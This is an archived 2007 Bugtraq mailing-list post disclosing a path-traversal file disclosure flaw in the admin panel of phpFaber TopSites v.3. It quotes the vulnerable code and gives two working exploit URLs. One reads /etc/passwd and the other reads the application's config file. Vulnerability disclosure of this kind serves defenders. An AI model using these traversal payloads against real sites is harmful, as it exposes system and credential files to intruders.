| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | nEw Bug :D |
| From: | "asdasd asdsadas" <dr.rover@hackermail.com> |
| Date: | Wed, 11 Apr 2007 23:33:53 +0800 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
# phpFaber TopSites v.3(index.php)Remote File Disclosure Vulnerability # D.Script: http://www.phpfaber.com/cms_content/files/phpfaber_topsites.zip # Discovered by: Dr.RoVeR -->Arab48 Hacker -->Dr.RoVeR@HackerMail.CoM # Greetz To: Tryag Team #You have to be admin to run the script :D # V.Code: ############################################################## #if (!$_GET['page'] || preg_match('/\W/',$_GET['page']) #|| !file_exists(PATH_SITE.FLD_ADMIN.$_GET['page'].'.php')) #$_GET['page'] = 'summary'; ############################################################## #Exploit:/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd #Exploit:/Path/admin/index.php?page=template&modify=inc/config.ini.php -- _______________________________________________ Get your free email from http://www.hackermail.com |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [ MDKSA-2007:080-1 ] - Updated tightvnc packages fix integer overflow vulnerabilities, security |
|---|---|
| Next by Date: | New bug :), asdasd asdsadas |
| Previous by Thread: | [ MDKSA-2007:080-1 ] - Updated tightvnc packages fix integer overflow vulnerabilities, security |
| Next by Thread: | New bug :), asdasd asdsadas |
| Indexes: | [Date] [Thread] [Top] [All Lists] |